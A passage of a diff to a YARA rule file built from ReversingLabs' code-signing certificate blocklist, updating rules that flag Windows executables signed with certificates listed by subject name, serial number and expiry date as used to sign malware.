pe.signatures[i].serial=="47:43:e1:40:c0:5b:33:f0:44:90:23:94:6b:d0:5a:cb" and 1607644800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0Ac5Ac5D323122E6D8E92D6E191B1432 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_A496Bc774575C31Abec861B68C36Dcb6 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9a363a84-c21c-5afe-9812-9ce16962b28a" + id = "51941c0d-a7a1-5c17-bef8-290e5db66fb7" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13912-L13928" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d5e62d3cdfacfaea70f9ee11230501bb9c4099508077d50a2a143cb69476f02a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7978-L7996" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f82214f982c9972e547f77966c44e935e9de701cc9108ceca34a4fede850d243" score = 75 quality = 90 tags = "INFO, FILE" @@ -19437,22 +39228,22 @@ rule REVERSINGLABS_Cert_Blocklist_0Ac5Ac5D323122E6D8E92D6E191B1432 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Certified Software" and pe.signatures[i].serial=="0a:c5:ac:5d:32:31:22:e6:d8:e9:2d:6e:19:1b:14:32" and 1140134400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ORGLE DVORSAK, d.o.o" and (pe.signatures[i].serial=="00:a4:96:bc:77:45:75:c3:1a:be:c8:61:b6:8c:36:dc:b6" or pe.signatures[i].serial=="a4:96:bc:77:45:75:c3:1a:be:c8:61:b6:8c:36:dc:b6") and 1606867200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2433D9Df7Efbccb870Ee5904D62A0101 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0A55C15F733Bf1633E9Ffae8A6E3B37D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6cd46771-06ea-51c9-ad84-4b28f4f8442b" + id = "32cefe84-b305-5542-a5d3-1832dcbf6d61" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13930-L13946" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "92a2effe1b94345f52130e4cb1db181f1990e58eaefb9c74375c14249cc1be22" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7998-L8014" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "89ca9f1c5cf0b029748528d8c5bb65f89ee05877bfdc13b4ce3d2d3e7feafb5d" score = 75 quality = 90 tags = "INFO, FILE" @@ -19462,22 +39253,22 @@ rule REVERSINGLABS_Cert_Blocklist_2433D9Df7Efbccb870Ee5904D62A0101 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Conpavi AG" and pe.signatures[i].serial=="24:33:d9:df:7e:fb:cc:b8:70:ee:59:04:d6:2a:01:01" and 1322438400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Osnova OOO" and pe.signatures[i].serial=="0a:55:c1:5f:73:3b:f1:63:3e:9f:fa:e8:a6:e3:b3:7d" and 1604016000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_462Baada57570F70Df76D10B9E7Bf2B7 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_C650Ae531100A91389A7F030228B3095 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2863a050-ebce-5322-b64a-9160adf6cc21" + id = "5d506480-96ca-5e71-9fb2-185b2f8ddc6c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13948-L13964" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c48207907339ce3fb7b6bc630097761a24495a9d4e69d421f2bdb36ddc92abcb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8016-L8034" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "186b66283491cfebcaade57b1010ce4304c08ddb131153984210c2c7025961aa" score = 75 quality = 90 tags = "INFO, FILE" @@ -19487,22 +39278,22 @@ rule REVERSINGLABS_Cert_Blocklist_462Baada57570F70Df76D10B9E7Bf2B7 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DVERI FADO, TOV" and pe.signatures[i].serial=="46:2b:aa:da:57:57:0f:70:df:76:d1:0b:9e:7b:f2:b7" and 1551744000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "POKEROWA STRUNA SP Z O O" and (pe.signatures[i].serial=="00:c6:50:ae:53:11:00:a9:13:89:a7:f0:30:22:8b:30:95" or pe.signatures[i].serial=="c6:50:ae:53:11:00:a9:13:89:a7:f0:30:22:8b:30:95") and 1606089600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_83320D93Dd8Cf16D11F99B1078B0A7Cb : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3990362C34015Ce4C23Ecc3377Fd3C06 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "12ce9be9-4644-5b59-aed2-ce4b04fcc46a" + id = "453b5da2-ae26-5005-8a56-1105a960fde6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13966-L13984" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "94ec5e05357767cc0c4cd1fc8ff6d1a366359ba699c43f3710204d761e7e707f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8036-L8052" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0625800fcb166b56cab2e16d0d757983a6f880b68627ed8c3c38419dd9a32999" score = 75 quality = 90 tags = "INFO, FILE" @@ -19512,22 +39303,22 @@ rule REVERSINGLABS_Cert_Blocklist_83320D93Dd8Cf16D11F99B1078B0A7Cb : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TRANS LTD" and (pe.signatures[i].serial=="00:83:32:0d:93:dd:8c:f1:6d:11:f9:9b:10:78:b0:a7:cb" or pe.signatures[i].serial=="83:32:0d:93:dd:8c:f1:6d:11:f9:9b:10:78:b0:a7:cb") and 1524614400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RZOH ApS" and pe.signatures[i].serial=="39:90:36:2c:34:01:5c:e4:c2:3e:cc:33:77:fd:3c:06" and 1606780800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_10Bae1D20Cb4Cc36A0Ffac86 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_121Fca3Cfa4Bd011669F5Cc4E053Aa3F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a07d1c35-0026-526a-bf08-e6b07008da03" + id = "ebc47e1e-e6fe-581c-86b3-22e2e67a0b81" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13986-L14002" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "44e91fbf4da8e81859a21408ee9f1971f1e8f48d22553fcaa6469156d4a0670b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8054-L8070" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1edd5be3f970202be15080cd7ef19c0cce7fcba73cb6120d7cb7d518e877cf85" score = 75 quality = 90 tags = "INFO, FILE" @@ -19537,22 +39328,22 @@ rule REVERSINGLABS_Cert_Blocklist_10Bae1D20Cb4Cc36A0Ffac86 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="10:ba:e1:d2:0c:b4:cc:36:a0:ff:ac:86" and 1476773830<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kymijoen Projektipalvelut Oy" and pe.signatures[i].serial=="12:1f:ca:3c:fa:4b:d0:11:66:9f:5c:c4:e0:53:aa:3f" and 1606953600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_230716Bfe915Dd6203B2E2A35674C2Ee : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D338F8A490E37E6C2Be80A0E349929Fa : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "849c390e-f81f-558e-88a3-19242c127a56" + id = "93ca450e-7278-5c6c-aba8-e90728570e0c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14004-L14020" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0197ff46ceb1017488da4383436fd0ddc375904f36cc16c5a8ef21d633ec387c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8072-L8090" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "39d9695803e96508b5ad12a7d9f8b65d13288dbe94b21a4952e096dd576e11ce" score = 75 quality = 90 tags = "INFO, FILE" @@ -19562,22 +39353,22 @@ rule REVERSINGLABS_Cert_Blocklist_230716Bfe915Dd6203B2E2A35674C2Ee : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Jiang Liu" and pe.signatures[i].serial=="23:07:16:bf:e9:15:dd:62:03:b2:e2:a3:56:74:c2:ee" and 1472169600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SAGUARO ApS" and (pe.signatures[i].serial=="00:d3:38:f8:a4:90:e3:7e:6c:2b:e8:0a:0e:34:99:29:fa" or pe.signatures[i].serial=="d3:38:f8:a4:90:e3:7e:6c:2b:e8:0a:0e:34:99:29:fa") and 1607558400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_36A77D37E68E02Fd3D043C7197E044Ca : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2C1Ee9B583310B5E34A1Ee6945A34B26 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "721e48fb-3046-5b2d-8ad9-ae340e598794" + id = "70fc063e-f032-5e63-ae53-65a25d5a29c3" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14022-L14038" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fc13ac5880cc2c8eac9ff8d09f6c5c2055b2de54d460a284936a4f6cd78192e8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8092-L8108" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7752e49e8848863d78c5de03c3d194498765d80da00a84c5164c7a9010d13474" score = 75 quality = 90 tags = "INFO, FILE" @@ -19587,22 +39378,22 @@ rule REVERSINGLABS_Cert_Blocklist_36A77D37E68E02Fd3D043C7197E044Ca : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Direct Systems Ltd" and pe.signatures[i].serial=="36:a7:7d:37:e6:8e:02:fd:3d:04:3c:71:97:e0:44:ca" and 1515542400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Artmarket" and pe.signatures[i].serial=="2c:1e:e9:b5:83:31:0b:5e:34:a1:ee:69:45:a3:4b:26" and 1607558400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_73Bff2Fb714F986C1707165F0B0F2E0E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D875B3E3F2Db6C3Eb426E24946066111 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f014b446-0ddc-51df-898c-200bd60181a0" + id = "4aedeb77-181b-5422-bec4-93c84412bae4" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14040-L14056" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d79ab926cbc0049d39f5f4c6e57afc71b1a30311a4816fdb66a9c2e257cc84af" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8110-L8128" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9e181271d46c828b9ec266331e077b3b4891a193c71173447da383fad91ae878" score = 75 quality = 90 tags = "INFO, FILE" @@ -19612,22 +39403,22 @@ rule REVERSINGLABS_Cert_Blocklist_73Bff2Fb714F986C1707165F0B0F2E0E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Tecnopolis Consulting Ltd" and pe.signatures[i].serial=="73:bf:f2:fb:71:4f:98:6c:17:07:16:5f:0b:0f:2e:0e" and 1090886400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kubit LLC" and (pe.signatures[i].serial=="00:d8:75:b3:e3:f2:db:6c:3e:b4:26:e2:49:46:06:61:11" or pe.signatures[i].serial=="d8:75:b3:e3:f2:db:6c:3e:b4:26:e2:49:46:06:61:11") and 1606953600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_33B24170694Ca0Cf4D2Bdf4Aadf475A3 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ad0A958Cdf188Bed43154A54Bf23Afba : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c02d7aaf-e88a-5aba-a8ee-db34562e53b1" + id = "183d9d02-885b-5f2f-b455-dd72af7bc5a6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14058-L14074" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "795bcb46b41ded084e4d12d98e335748ec1db3e0abbbb2d933e819d955075138" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8130-L8148" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "07e53e59f90aa3cd3a98dbca2627672606f6c6f8f3bda8456e32122463729c4b" score = 75 quality = 90 tags = "INFO, FILE" @@ -19637,22 +39428,22 @@ rule REVERSINGLABS_Cert_Blocklist_33B24170694Ca0Cf4D2Bdf4Aadf475A3 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="33:b2:41:70:69:4c:a0:cf:4d:2b:df:4a:ad:f4:75:a3" and 1474934400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RHM Ltd" and (pe.signatures[i].serial=="00:ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" or pe.signatures[i].serial=="ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba") and 1612915200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3A9Bdec10E00E780316Baaebfe7A772C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3Cee26C125B8C188F316C3Fa78D9C2F1 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "56f62454-84a1-5843-b2f4-fa84b37040f3" + id = "79989b9b-60e4-577d-97e2-cb447c38baf3" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14076-L14092" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ea9bc11efd2969f6b7112338f2b084ea3551e072e46b1162bd47b08be549cdd4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8150-L8166" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5c64f8e40c31822ce8d2e34f96ccc977085e429f0c068a5f6b44099117837de1" score = 75 quality = 90 tags = "INFO, FILE" @@ -19662,22 +39453,22 @@ rule REVERSINGLABS_Cert_Blocklist_3A9Bdec10E00E780316Baaebfe7A772C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PLAN ALPHA LIMITED" and pe.signatures[i].serial=="3a:9b:de:c1:0e:00:e7:80:31:6b:aa:eb:fe:7a:77:2c" and 1556582400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Bitubit LLC" and pe.signatures[i].serial=="3c:ee:26:c1:25:b8:c1:88:f3:16:c3:fa:78:d9:c2:f1" and 1606435200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7Cad9C37F7Affa8F4D8229F97607E265 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4C687A0022C36F89E253F91D1F6954E2 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "dae6b474-e4f0-5c73-b32e-d2680f508799" + id = "c45a2125-dd7c-5ff1-89a8-35cbe1d924d7" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14094-L14110" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0f88989c64bece23e7eccf8022e038fdd9c360766de71268cf71616f74adc56c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8168-L8184" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "287c0c7a25e33e0e7def6efa23dbd2efba7c4ac3aa8f5deb8568a60a95e08bbe" score = 75 quality = 90 tags = "INFO, FILE" @@ -19687,22 +39478,22 @@ rule REVERSINGLABS_Cert_Blocklist_7Cad9C37F7Affa8F4D8229F97607E265 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Funbit" and pe.signatures[i].serial=="7c:ad:9c:37:f7:af:fa:8f:4d:82:29:f9:76:07:e2:65" and 1122508800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HETCO ApS" and pe.signatures[i].serial=="4c:68:7a:00:22:c3:6f:89:e2:53:f9:1d:1f:69:54:e2" and 1606780800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_098A57 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ca646B4275406Df639Cf603756F63D77 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4604f1a6-2fdb-5917-943d-f0e2dbaaa29e" + id = "b176b7f8-e3d1-593c-91c3-03e781f6ef7b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14112-L14128" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5e203f87dd4608ba5d583e02ce86fbe230e45fff86a7a697766e149d0cf6f436" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8186-L8204" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a690e3f6a656835984e47d999271fe441a5fbf424208da8d5b3c9ddcef47b70e" score = 75 quality = 90 tags = "INFO, FILE" @@ -19712,22 +39503,22 @@ rule REVERSINGLABS_Cert_Blocklist_098A57 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ELECTRONIC GROUP" and pe.signatures[i].serial=="09:8a:57" and 1032855179<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SHOECORP LIMITED" and (pe.signatures[i].serial=="00:ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" or pe.signatures[i].serial=="ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77") and 1605830400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5389Cc6286Da3Bfa1Dc4Df498Bf68361 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Addbec454B5479Cabd940A72Df4500Af : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "973aaf33-25a2-5f40-a5a7-d9f77e3589b3" + id = "f2488d44-5a9a-5ab6-be6f-f3444f72444a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14130-L14146" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d25d998c980f47f4da065155451503dcbc677ad041af85a6ed7060ecadec66b3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8206-L8224" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "799629791646c524d170b900339b87474aed73b7156a8c4dd20f7c13cbe97929" score = 75 quality = 90 tags = "INFO, FILE" @@ -19737,22 +39528,22 @@ rule REVERSINGLABS_Cert_Blocklist_5389Cc6286Da3Bfa1Dc4Df498Bf68361 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Joerm.com" and pe.signatures[i].serial=="53:89:cc:62:86:da:3b:fa:1d:c4:df:49:8b:f6:83:61" and 1495497600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SHAT LIMITED" and (pe.signatures[i].serial=="00:ad:db:ec:45:4b:54:79:ca:bd:94:0a:72:df:45:00:af" or pe.signatures[i].serial=="ad:db:ec:45:4b:54:79:ca:bd:94:0a:72:df:45:00:af") and 1612828800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Ed9Caeb7911B31Bd : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ac307E5257Bb814B818D3633B630326F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1eeff730-c2ce-5689-a8cb-455618738a82" + id = "c33d798a-854c-5fab-afbe-e94d142befa7" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14148-L14166" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "02cfdf883212387a465af3e692b29b8d0eb8249e0a260f18bec2f662d775b606" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8226-L8244" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "10819bd2194fface6db812f8c6770c306c183386d2d9ba97467a5b55fd997194" score = 75 quality = 90 tags = "INFO, FILE" @@ -19762,22 +39553,22 @@ rule REVERSINGLABS_Cert_Blocklist_Ed9Caeb7911B31Bd : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE5\\xA4\\xA9\\xE6\\xB8\\xB8\\xE8\\xBD\\xAF\\xE4\\xBB\\xB6\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and (pe.signatures[i].serial=="00:ed:9c:ae:b7:91:1b:31:bd" or 